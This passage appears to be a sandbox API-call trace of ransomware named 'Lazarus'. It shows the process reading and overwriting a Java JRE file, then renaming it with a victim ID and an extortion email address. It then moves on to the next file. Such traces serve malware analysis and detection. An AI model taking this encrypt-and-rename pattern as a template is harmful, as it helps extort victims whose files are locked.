0x883b0 [0095.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0095.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0095.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0095.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0095.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0095.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0095.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.409] AreFileApisANSI () returned 1 [0095.409] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0095.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0095.409] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x75dc8, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar") returned 56 [0095.409] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8bb82c9, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3ae816)) returned 1 [0095.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0095.409] AreFileApisANSI () returned 1 [0095.409] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x313f4e8, cbMultiByte=-1, lpWideCharStr=0x313f500, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0095.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0095.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0095.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0095.410] GetLastError () returned 0x0 [0095.410] SetLastError (dwErrCode=0x0) [0095.410] AreFileApisANSI () returned 1 [0095.410] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0095.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0095.410] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x75fa8, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar") returned 56 [0095.410] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134e8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0095.410] GetFileType (hFile=0x368) returned 0x1 [0095.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0095.410] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3113594 | out: lpNewFilePointer=0x0) returned 1 [0095.410] ReadFile (in: hFile=0x368, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113570, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113570*=0x15000, lpOverlapped=0x0) returned 1 [0095.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8f448 [0095.622] ReadFile (in: hFile=0x368, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x3113518*=0x1000, lpOverlapped=0x0) returned 1 [0095.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d780 [0095.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6c0 [0095.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4df50 [0095.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x4f220 [0095.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b568 [0095.749] GetLastError () returned 0x0 [0095.749] SetLastError (dwErrCode=0x0) [0095.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0095.749] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0095.749] WriteFile (in: hFile=0x368, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0095.750] WriteFile (in: hFile=0x368, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0095.750] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8f448 | out: hHeap=0x20000) returned 1 [0095.750] CloseHandle (hObject=0x368) returned 1 [0095.750] AreFileApisANSI () returned 1 [0095.750] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0095.750] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0095.750] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x75d50, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar") returned 56 [0095.750] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134d0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0095.750] GetFileType (hFile=0x368) returned 0x1 [0095.750] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0095.750] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x311357c | out: lpNewFilePointer=0x0) returned 1 [0095.751] ReadFile (in: hFile=0x368, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113558, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113558*=0x15000, lpOverlapped=0x0) returned 1 [0095.752] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8f448 [0095.752] ReadFile (in: hFile=0x368, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113500, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x3113500*=0x1000, lpOverlapped=0x0) returned 1 [0095.753] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e298 [0095.753] GetLastError () returned 0x0 [0095.753] SetLastError (dwErrCode=0x0) [0095.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0095.753] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0095.753] WriteFile (in: hFile=0x368, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0095.754] WriteFile (in: hFile=0x368, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0095.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8f448 | out: hHeap=0x20000) returned 1 [0095.754] CloseHandle (hObject=0x368) returned 1 [0095.754] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0095.754] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71758 [0095.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0095.754] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8ace8 [0095.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0095.754] AreFileApisANSI () returned 1 [0095.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0095.754] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0095.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x75fa8, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar") returned 56 [0095.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8ace8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 118 [0095.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xec) returned 0x4ba80 [0095.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8ace8, cbMultiByte=-1, lpWideCharStr=0x4ba80, cchWideChar=118 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 118 [0095.755] MoveFileExW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\cldrdata.jar.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwFlags=0x2) returned 1 [0095.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ba80 | out: hHeap=0x20000) returned 1 [0095.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0095.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0095.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6c0 | out: hHeap=0x20000) returned 1 [0095.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d780 | out: hHeap=0x20000) returned 1 [0095.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0095.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b568 | out: hHeap=0x20000) returned 1 [0095.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0095.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0095.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0095.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0095.756] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.756] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.756] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8bb82c9, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8bb82c9, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8bb82c9, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x205e, dwReserved0=0x9fc42470, dwReserved1=0x1f848267, cFileName="dnsns.jar", cAlternateFileName="")) returned 1 [0095.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0095.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0095.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0095.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0095.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0095.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0095.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0095.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0095.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0095.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8aeb0 [0095.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0095.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0095.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0095.756] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.756] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.756] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.756] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0095.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.756] AreFileApisANSI () returned 1 [0095.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\dnsns.jar", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\dnsns.jar", lpUsedDefaultChar=0x0) returned 53 [0095.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0095.757] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.757] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0095.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0095.757] AreFileApisANSI () returned 1 [0095.757] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0095.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76110 [0095.757] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x76110, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\dnsns.jar") returned 53 [0095.757] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\dnsns.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\dnsns.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0095.757] GetFileType (hFile=0x368) returned 0x1 [0095.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0095.757] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0095.757] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0095.758] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0095.758] CloseHandle (hObject=0x368) returned 1 [0095.758] AreFileApisANSI () returned 1 [0095.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0095.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75dc8 [0095.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x75dc8, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\dnsns.jar") returned 53 [0095.758] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\dnsns.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\dnsns.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0095.758] GetFileType (hFile=0x368) returned 0x1 [0095.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0095.758] CloseHandle (hObject=0x368) returned 1 [0095.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0095.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0095.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0095.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0095.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0095.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0095.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0095.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0095.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | 